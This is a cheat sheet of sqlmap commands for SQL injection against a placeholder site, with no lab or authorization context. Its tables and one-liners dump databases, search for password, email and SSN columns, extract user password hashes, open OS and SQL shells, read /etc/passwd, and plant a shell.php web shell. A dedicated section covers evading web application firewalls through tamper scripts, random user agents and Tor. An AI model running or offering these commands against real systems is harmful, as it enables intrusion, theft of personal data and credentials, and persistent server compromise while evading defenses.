Sqlmap Command Sheet
https://github.com/sqlmapproject/sqlmap/wiki/usage
### Basic Enumeration
| Goal | Command |
|---|---|
| List databases | `sqlmap -u "http://target.com/page.php?id=1" --dbs` |
| List tables in a DB | `sqlmap -u "http://target.com/page.php?id=1" -D dbname --tables` |
| List columns in a table | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --columns` |
| Dump entire table | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump` |
| Dump limited rows | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump --start=1 --stop=20` |
| Dump specific columns | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump -C "col1,col2,col3"` |
### WAF / 403 Bypass
| Goal | Command |
|---|---|
| Random User-Agent | `--random-agent` |
| Tamper scripts | `--tamper=space2comment` |
| Multiple tamper scripts | `--tamper=space2comment,between,randomcase` |
| Delay between requests | `--delay=1` |
| Increase timeout | `--timeout=10` |
| Use HTTP(S) proxy | `--proxy="http://127.0.0.1:8080"` |
| Tor proxy | `--tor --tor-type=SOCKS5` |
| Randomize parameters | `--randomize=id` |
| Skip URL encoding | `--skip-urlencode` |
| Use stealthier level/risk | `--level=1 --risk=1` (default, slower but quieter) |
### Authentication & Headers
| Goal | Command |
|---|---|
| Cookie | `--cookie="PHPSESSID=abc123"` |
| Custom header | `--headers="X-Forwarded-For: 127.0.0.1"` |
| HTTP auth | `--auth-type=Basic --auth-cred="user:pass"` |
| POST data | `-u "http://target.com/login.php" --data="user=admin&pass=test"` |
### Injection Point Control
| Goal | Command |
|---|---|
| Specify injection param | `-p "id"` |
| Test all GET params | `--level=5 --risk=3` |
| Skip specific params | `--skip="token,captcha"` |
| Provide param in URL | `-u "http://target.com/page.php?id=1&cat=5"` |
| From POST body | `-u "http://target.com/api" --data="id=1"` |
### Data Extraction Options
| Goal | Command |
|---|---|
| Search for columns | `--search -C "password,email,ssn"` |
| Get DB user | `--current-user` |
| Get DB name | `--current-db` |
| Get DB version banner | `--banner` |
| Check if DBA (admin) | `--is-dba` |
| List DB users | `--users` |
| List DB user passwords | `--passwords` |
| OS shell (if file privs) | `--os-shell` |
| SQL shell | `--sql-shell` |
### Read/Write Files (requires FILE privilege)
| Goal | Command |
|---|---|
| Read file | `--file-read="/etc/passwd"` |
| Write file | `--file-write="/tmp/shell.php" --file-dest="/var/www/html/shell.php"` |
### Output & Session
| Goal | Command |
|---|---|
| Resume saved session | (auto — just run same URL again) |
| Flush session | `--flush-session` |
| Output to CSV/TSV | auto-generated under `~/.local/share/sqlmap/output/` (Linux) or `%LOCALAPPDATA%\sqlmap\output\` (Windows) |
| Batch mode (default yes) | `--batch` |
---
### Common Combo (new site — full recon)
```bash
sqlmap -u "http://target.com/page.php?id=1" --random-agent --tamper=space2comment --batch --dbs
```
### Common Combo (dump specific table with bypass)
```bash
sqlmap -u "http://target.com/page.php?id=1" -D targetdb -T users --dump --random-agent --tamper=space2comment --batch --start=1 --stop=50
```
### If you have a request file (from Burp/ZAP)
```bash
sqlmap -r request.txt --batch
```

